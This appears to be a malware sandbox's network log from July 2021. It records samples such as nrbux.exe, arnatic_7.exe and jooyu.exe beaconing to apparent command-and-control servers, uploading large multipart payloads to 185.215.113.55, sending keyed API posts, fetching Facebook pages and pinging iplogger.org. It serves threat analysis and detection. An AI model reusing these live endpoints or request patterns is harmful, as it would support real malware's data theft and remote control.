                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        87.251.71.195:82
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Host: 87.251.71.195:82
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        87.251.71.195:82
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Host: 87.251.71.195:82
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.215.113.55:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /t5BnOoke2/index.php HTTP/1.1
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Host: 185.215.113.55
                                                                                                                                                                                        Content-Length: 84
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:33:27 GMT
                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                        Content-Length: 6
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php?scr=1
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.215.113.55:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /t5BnOoke2/index.php?scr=1 HTTP/1.1
                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----ec01b39d03ce886c2c15019bf5bdd886
                                                                                                                                                                                        Host: 185.215.113.55
                                                                                                                                                                                        Content-Length: 89453
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        87.251.71.195:82
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Host: 87.251.71.195:82
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.215.113.55:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /t5BnOoke2/index.php HTTP/1.1
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Host: 185.215.113.55
                                                                                                                                                                                        Content-Length: 84
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:34:28 GMT
                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                        Content-Length: 6
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        87.251.71.195:82
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Host: 87.251.71.195:82
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        87.251.71.195:82
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Host: 87.251.71.195:82
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        87.251.71.195:82
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Host: 87.251.71.195:82
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        87.251.71.195:82
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Host: 87.251.71.195:82
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        www.facebook.com
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        www.facebook.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        www.facebook.com
                                                                                                                                                                                        IN CNAME
                                                                                                                                                                                        star-mini.c10r.facebook.com
                                                                                                                                                                                        star-mini.c10r.facebook.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        31.13.64.35
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://www.facebook.com/
                                                                                                                                                                                        arnatic_4.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        31.13.64.35:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET / HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                                        Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                                                                                                                                        viewport-width: 1920
                                                                                                                                                                                        Sec-Fetch-Dest: document
                                                                                                                                                                                        Sec-Fetch-Mode: navigate
                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                        Sec-Fetch-User: ?1
                                                                                                                                                                                        Upgrade-Insecure-Requests: 1
                                                                                                                                                                                        Host: www.facebook.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Set-Cookie: fr=1f2RkyCpEznlERiEg..Bg3sG6.kQ.AAA.0.0.Bg3sG6.AWX7RIB9AD8; expires=Thu, 30-Sep-2021 07:35:21 GMT; Max-Age=7775999; path=/; domain=.facebook.com; secure; httponly; SameSite=None
                                                                                                                                                                                        Set-Cookie: sb=usHeYOCtX59FzkqRtgNApvnc; expires=Sun, 02-Jul-2023 07:35:22 GMT; Max-Age=63072000; path=/; domain=.facebook.com; secure; httponly; SameSite=None
                                                                                                                                                                                        Alt-Svc: h2="facebook2b5efqy23fbcbpzs5xkfqfuwjc3csaqqvkggj3pkwkb25aid.onion:443"; ma=86400
                                                                                                                                                                                        x-fb-rlafr: 0
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Cache-Control: private, no-cache, no-store, must-revalidate
                                                                                                                                                                                        Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        content-security-policy: default-src * data: blob: 'self';script-src *.facebook.com *.fbcdn.net *.facebook.net *.google-analytics.com *.google.com 127.0.0.1:* 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src data: blob: 'unsafe-inline' *;connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net wss://*.facebook.com:* wss://*.whatsapp.com:* attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self';block-all-mixed-content;upgrade-insecure-requests;
                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000; preload
                                                                                                                                                                                        Content-Type: text/html; charset="utf-8"
                                                                                                                                                                                        X-FB-Debug: 6U6rniBlzsGrK5KcCbsVbH83ND6d03mwzdGxsnbsMpl84FdvHs/PrW2hrq/AP/G/EDz1E1iA/ij209d/yEHIqQ==
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:35:22 GMT
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://uyg5wye.2ihsfa.com/api/fbtime
                                                                                                                                                                                        arnatic_4.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        88.218.92.148:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /api/fbtime HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                                                                                                                                        Host: uyg5wye.2ihsfa.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:35:25 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        X-Powered-By: PHP/7.3.21
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://uyg5wye.2ihsfa.com/api/?sid=297807&key=6f62acb440fd1c860856850e882a0027
                                                                                                                                                                                        arnatic_4.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        88.218.92.148:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /api/?sid=297807&key=6f62acb440fd1c860856850e882a0027 HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                                                                                                                                        Content-Length: 266
                                                                                                                                                                                        Host: uyg5wye.2ihsfa.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:35:25 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        X-Powered-By: PHP/7.3.21
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.215.113.55:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /t5BnOoke2/index.php HTTP/1.1
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Host: 185.215.113.55
                                                                                                                                                                                        Content-Length: 84
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:35:29 GMT
                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                        Content-Length: 6
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.215.113.55:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /t5BnOoke2/index.php HTTP/1.1
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Host: 185.215.113.55
                                                                                                                                                                                        Content-Length: 84
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php?scr=1
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.215.113.55:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /t5BnOoke2/index.php?scr=1 HTTP/1.1
                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----b4f9264d6c20410f2827fcb869e0c042
                                                                                                                                                                                        Host: 185.215.113.55
                                                                                                                                                                                        Content-Length: 89449
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:37:15 GMT
                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.215.113.55:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /t5BnOoke2/index.php HTTP/1.1
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Host: 185.215.113.55
                                                                                                                                                                                        Content-Length: 84
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        www.facebook.com
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        www.facebook.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        www.facebook.com
                                                                                                                                                                                        IN CNAME
                                                                                                                                                                                        star-mini.c10r.facebook.com
                                                                                                                                                                                        star-mini.c10r.facebook.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        31.13.83.36
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://www.facebook.com/
                                                                                                                                                                                        jooyu.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        31.13.83.36:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET / HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                                        Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                                                                                                                                        viewport-width: 1920
                                                                                                                                                                                        Sec-Fetch-Dest: document
                                                                                                                                                                                        Sec-Fetch-Mode: navigate
                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                        Sec-Fetch-User: ?1
                                                                                                                                                                                        Upgrade-Insecure-Requests: 1
                                                                                                                                                                                        Host: www.facebook.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Set-Cookie: fr=1cVWn5AhVnGHoF6bp..Bg3sI0.29.AAA.0.0.Bg3sI0.AWUXKEC1qo0; expires=Thu, 30-Sep-2021 07:37:23 GMT; Max-Age=7775999; path=/; domain=.facebook.com; secure; httponly; SameSite=None
                                                                                                                                                                                        Set-Cookie: sb=NMLeYMGZSg_rrxr_Z9h673xq; expires=Sun, 02-Jul-2023 07:37:24 GMT; Max-Age=63072000; path=/; domain=.facebook.com; secure; httponly; SameSite=None
                                                                                                                                                                                        x-fb-rlafr: 0
                                                                                                                                                                                        Alt-Svc: h2="facebook266ixdylqbalcxb5hsq5n2g633knuxllgzg2gkqe7bligvqd.onion:443"; ma=86400
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Cache-Control: private, no-cache, no-store, must-revalidate
                                                                                                                                                                                        Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        content-security-policy: default-src * data: blob: 'self';script-src *.facebook.com *.fbcdn.net *.facebook.net *.google-analytics.com *.google.com 127.0.0.1:* 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src data: blob: 'unsafe-inline' *;connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net wss://*.facebook.com:* wss://*.whatsapp.com:* attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self';block-all-mixed-content;upgrade-insecure-requests;
                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000; preload
                                                                                                                                                                                        Content-Type: text/html; charset="utf-8"
                                                                                                                                                                                        X-FB-Debug: Yl+xON3cXWlAW8Q0MSaSzqz2b60qmuV2Cr/Bq3VzwtdOTBUH6133zDrmey2HbBK3UKGRDB5hOci0eLNzQRC3kA==
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:37:24 GMT
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        87.251.71.195:82
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Host: 87.251.71.195:82
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://uyg5wye.2ihsfa.com/api/fbtime
                                                                                                                                                                                        jooyu.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        88.218.92.148:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /api/fbtime HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                                                                                                                                        Host: uyg5wye.2ihsfa.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:37:27 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        X-Powered-By: PHP/7.3.21
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://uyg5wye.2ihsfa.com/api/?sid=298539&key=366454b36c6152980d512ef63d850b04
                                                                                                                                                                                        jooyu.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        88.218.92.148:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /api/?sid=298539&key=366454b36c6152980d512ef63d850b04 HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                                                                                                                                        Content-Length: 266
                                                                                                                                                                                        Host: uyg5wye.2ihsfa.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:37:28 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        X-Powered-By: PHP/7.3.21
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        iplogger.org
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        iplogger.org
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        iplogger.org
                                                                                                                                                                                        IN A
                                                                                                                                                                                        88.99.66.31
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://iplogger.org/18hh57
                                                                                                                                                                                        jooyu.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        88.99.66.31:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /18hh57 HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                                        Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                                                                                                                                        viewport-width: 1920
                                                                                                                                                                                        Host: iplogger.org
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:37:28 GMT
                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Set-Cookie: PHPSESSID=tmtossrqagtssoauhecqit6dg6; path=/; HttpOnly
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Set-Cookie: clhf03028ja=185.220.101.21; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=253836743; path=/
                                                                                                                                                                                        Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                        Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        Answers:
                                                                                                                                                                                        whoami: f8e4e9484cf4a972cde7979fdabba638cb2f344f646867b2abc4b52cdbc04451
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        84.40.106.91
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        91.203.174.38
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        1.247.35.250
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        121.67.142.131
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        211.53.230.69
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        118.129.116.119
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        61.253.197.172
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        121.67.118.220
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        196.200.111.5
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        123.215.94.239
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://lahuertasonora.com/upload/
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        84.40.106.91:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /upload/ HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Referer: http://lahuertasonora.com/upload/
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                        Content-Length: 130
                                                                                                                                                                                        Host: lahuertasonora.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.0 404 Not Found
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:37:41 GMT
                                                                                                                                                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                                                                        X-Powered-By: PHP/5.6.40
                                                                                                                                                                                        Content-Length: 7
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
